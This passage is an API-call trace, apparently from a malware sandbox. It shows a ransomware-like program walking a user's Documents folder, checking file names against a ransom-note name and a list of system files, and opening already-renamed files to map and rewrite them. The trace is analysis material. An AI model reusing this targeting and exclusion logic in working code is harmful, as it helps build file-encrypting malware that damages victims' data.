HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx.aOhK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx.aOhK" [0185.391] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx.aOhK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\xejzjaz6j g_ckr.pptx.aohk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.392] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=54477) returned 1 [0185.392] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.392] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.392] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.393] CloseHandle (hObject=0x268) returned 1 [0185.393] CloseHandle (hObject=0x264) returned 1 [0185.393] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.393] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x656f2540, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x6ab21a80, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0xaec0de40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x155f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="YeFEah28pGy.pdf.d2OMH1", cAlternateFileName="YEFEAH~1.D2O")) returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="DECRYPT-FILES.txt") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="autorun.inf") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="boot.ini") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="desktop.ini") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="ntuser.dat") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="iconcache.db") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="bootsect.bak") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="ntuser.dat.log") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="thumbs.db") returned 1 [0185.393] lstrcmpiW (lpString1="YeFEah28pGy.pdf.d2OMH1", lpString2="Bootfont.bin") returned 1 [0185.393] lstrlenW (lpString="YeFEah28pGy.pdf.d2OMH1") returned 22 [0185.393] lstrcmpiW (lpString1="d2OMH1", lpString2="lnk") returned -1 [0185.393] lstrcmpiW (lpString1="d2OMH1", lpString2="exe") returned -1 [0185.393] lstrcmpiW (lpString1="d2OMH1", lpString2="sys") returned -1 [0185.393] lstrcmpiW (lpString1="d2OMH1", lpString2="dll") returned -1 [0185.393] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.393] lstrlenW (lpString="YeFEah28pGy.pdf.d2OMH1") returned 22 [0185.393] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.393] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="YeFEah28pGy.pdf.d2OMH1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf.d2OMH1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf.d2OMH1" [0185.393] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf.d2OMH1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\yefeah28pgy.pdf.d2omh1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.394] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=87542) returned 1 [0185.394] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.394] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.395] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.395] CloseHandle (hObject=0x268) returned 1 [0185.395] CloseHandle (hObject=0x264) returned 1 [0185.395] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.395] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x656f2540, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x6ab21a80, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0xaec0de40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x155f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="YeFEah28pGy.pdf.d2OMH1", cAlternateFileName="YEFEAH~1.D2O")) returned 0 [0185.395] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.395] CloseHandle (hObject=0x25c) returned 1 [0185.395] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fb43640, ftCreationTime.dwHighDateTime=0x1d54e99, ftLastAccessTime.dwLowDateTime=0x7874d40, ftLastAccessTime.dwHighDateTime=0x1d54dd8, ftLastWriteTime.dwLowDateTime=0xaec5a100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x190d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Txzpa.docx.yB7xlL", cAlternateFileName="TXZPAD~1.YB7")) returned 1 [0185.395] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="DECRYPT-FILES.txt") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="autorun.inf") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="boot.ini") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="desktop.ini") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="ntuser.dat") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="iconcache.db") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="bootsect.bak") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="ntuser.dat.log") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="thumbs.db") returned 1 [0185.396] lstrcmpiW (lpString1="Txzpa.docx.yB7xlL", lpString2="Bootfont.bin") returned 1 [0185.396] lstrlenW (lpString="Txzpa.docx.yB7xlL") returned 17 [0185.396] lstrcmpiW (lpString1="yB7xlL", lpString2="lnk") returned 1 [0185.396] lstrcmpiW (lpString1="yB7xlL", lpString2="exe") returned 1 [0185.396] lstrcmpiW (lpString1="yB7xlL", lpString2="sys") returned 1 [0185.396] lstrcmpiW (lpString1="yB7xlL", lpString2="dll") returned 1 [0185.396] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.396] lstrlenW (lpString="Txzpa.docx.yB7xlL") returned 17 [0185.396] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.396] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Txzpa.docx.yB7xlL" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx.yB7xlL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx.yB7xlL" [0185.396] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx.yB7xlL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\txzpa.docx.yb7xll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.397] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=102611) returned 1 [0185.397] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.397] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.397] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.397] CloseHandle (hObject=0x260) returned 1 [0185.398] CloseHandle (hObject=0x25c) returned 1 [0185.398] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.398] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x623b87b0, ftCreationTime.dwHighDateTime=0x1d4ce49, ftLastAccessTime.dwLowDateTime=0x4546c50, ftLastAccessTime.dwHighDateTime=0x1d4cd01, ftLastWriteTime.dwLowDateTime=0xaeca63c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17ed5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vpMMF.odp.ouLWSnE", cAlternateFileName="VPMMFO~1.OUL")) returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="DECRYPT-FILES.txt") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="autorun.inf") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="boot.ini") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="desktop.ini") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="ntuser.dat") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="iconcache.db") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="bootsect.bak") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="ntuser.dat.log") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="thumbs.db") returned 1 [0185.398] lstrcmpiW (lpString1="vpMMF.odp.ouLWSnE", lpString2="Bootfont.bin") returned 1 [0185.398] lstrlenW (lpString="vpMMF.odp.ouLWSnE") returned 17 [0185.398] lstrcmpiW (lpString1="ouLWSnE", lpString2="lnk") returned 1 [0185.398] lstrcmpiW (lpString1="ouLWSnE", lpString2="exe") returned 1 [0185.398] lstrcmpiW (lpString1="ouLWSnE", lpString2="sys") returned -1 [0185.398] lstrcmpiW (lpString1="ouLWSnE", lpString2="dll") returned 1 [0185.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.398] lstrlenW (lpString="vpMMF.odp.ouLWSnE") returned 17 [0185.398] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.398] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="vpMMF.odp.ouLWSnE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp.ouLWSnE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp.ouLWSnE" [0185.398] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp.ouLWSnE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpmmf.odp.oulwsne"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.399] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=98005) returned 1 [0185.399] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.399] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.400] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.400] CloseHandle (hObject=0x260) returned 1 [0185.400] CloseHandle (hObject=0x25c) returned 1 [0185.400] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.400] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x769449b0, ftCreationTime.dwHighDateTime=0x1d52c16, ftLastAccessTime.dwLowDateTime=0x2bf065f0, ftLastAccessTime.dwHighDateTime=0x1d553c7, ftLastWriteTime.dwLowDateTime=0xaeccc520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x613, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", cAlternateFileName="WEBML2~1.98N")) returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="DECRYPT-FILES.txt") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="autorun.inf") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="boot.ini") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="desktop.ini") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="ntuser.dat") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="iconcache.db") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="bootsect.bak") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="ntuser.dat.log") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="thumbs.db") returned 1 [0185.400] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx.98Nx", lpString2="Bootfont.bin") returned 1 [0185.401] lstrlenW (lpString="WeBMl2HUYIyd3QDBr1.xlsx.98Nx") returned 28 [0185.401] lstrcmpiW (lpString1="98Nx", lpString2="lnk") returned -1 [0185.401] lstrcmpiW (lpString1="98Nx", lpString2="exe") returned -1 [0185.401] lstrcmpiW (lpString1="98Nx", lpString2="sys") returned -1 [0185.401] lstrcmpiW (lpString1="98Nx", lpString2="dll") returned -1 [0185.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.401] lstrlenW (lpString="WeBMl2HUYIyd3QDBr1.xlsx.98Nx") returned 28 [0185.401] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="WeBMl2HUYIyd3QDBr1.xlsx.98Nx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx.98Nx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx.98Nx" [0185.401] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx.98Nx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\webml2huyiyd3qdbr1.xlsx.98nx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.401] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1555) returned 1 [0185.401] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.401] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.402] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.402] CloseHandle (hObject=0x260) returned 1 [0185.402] CloseHandle (hObject=0x25c) returned 1 [0185.402] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.402] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb658cc20, ftCreationTime.dwHighDateTime=0x1d57ce7, ftLastAccessTime.dwLowDateTime=0xbee94490, ftLastAccessTime.dwHighDateTime=0x1d53990, ftLastWriteTime.dwLowDateTime=0xaecf2680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11c01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XGeoDXeT30sbcoQN.xlsx.a6YP4", cAlternateFileName="XGEODX~1.A6Y")) returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="DECRYPT-FILES.txt") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="autorun.inf") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="boot.ini") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="desktop.ini") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="ntuser.dat") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="iconcache.db") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="bootsect.bak") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="ntuser.dat.log") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="thumbs.db") returned 1 [0185.403] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx.a6YP4", lpString2="Bootfont.bin") returned 1 [0185.403] lstrlenW (lpString="XGeoDXeT30sbcoQN.xlsx.a6YP4") returned 27 [0185.403] lstrcmpiW (lpString1="a6YP4", lpString2="lnk") returned -1 [0185.403] lstrcmpiW (lpString1="a6YP4", lpString2="exe") returned -1 [0185.403] lstrcmpiW (lpString1="a6YP4", lpString2="sys") returned -1 [0185.403] lstrcmpiW (lpString1="a6YP4", lpString2="dll") returned -1 [0185.403] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.403] lstrlenW (lpString="XGeoDXeT30sbcoQN.xlsx.a6YP4") returned 27 [0185.403] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.403] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="XGeoDXeT30sbcoQN.xlsx.a6YP4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx.a6YP4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx.a6YP4" [0185.403] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx.a6YP4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgeodxet30sbcoqn.xlsx.a6yp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.404] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=72705) returned 1 [0185.404] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.404] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.404] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.404] CloseHandle (hObject=0x260) returned 1 [0185.405] CloseHandle (hObject=0x25c) returned 1 [0185.405] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.405] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7088860, ftCreationTime.dwHighDateTime=0x1d547b2, ftLastAccessTime.dwLowDateTime=0x4b046950, ftLastAccessTime.dwHighDateTime=0x1d5158d, ftLastWriteTime.dwLowDateTime=0xaed187e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x705e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xMaUz.pptx.bnLNf", cAlternateFileName="XMAUZP~1.BNL")) returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="DECRYPT-FILES.txt") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="autorun.inf") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="boot.ini") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="desktop.ini") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="ntuser.dat") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="iconcache.db") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="bootsect.bak") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="ntuser.dat.log") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="thumbs.db") returned 1 [0185.405] lstrcmpiW (lpString1="xMaUz.pptx.bnLNf", lpString2="Bootfont.bin") returned 1 [0185.405] lstrlenW (lpString="xMaUz.pptx.bnLNf") returned 16 [0185.405] lstrcmpiW (lpString1="bnLNf", lpString2="lnk") returned -1 [0185.405] lstrcmpiW (lpString1="bnLNf", lpString2="exe") returned -1 [0185.405] lstrcmpiW (lpString1="bnLNf", lpString2="sys") returned -1 [0185.405] lstrcmpiW (lpString1="bnLNf", lpString2="dll") returned -1 [0185.405] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.405] lstrlenW (lpString="xMaUz.pptx.bnLNf") returned 16 [0185.405] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.405] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="xMaUz.pptx.bnLNf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx.bnLNf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx.bnLNf" [0185.405] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx.bnLNf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xmauz.pptx.bnlnf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.406] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=28766) returned 1 [0185.406] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.406] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.407] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.407] CloseHandle (hObject=0x260) returned 1 [0185.407] CloseHandle 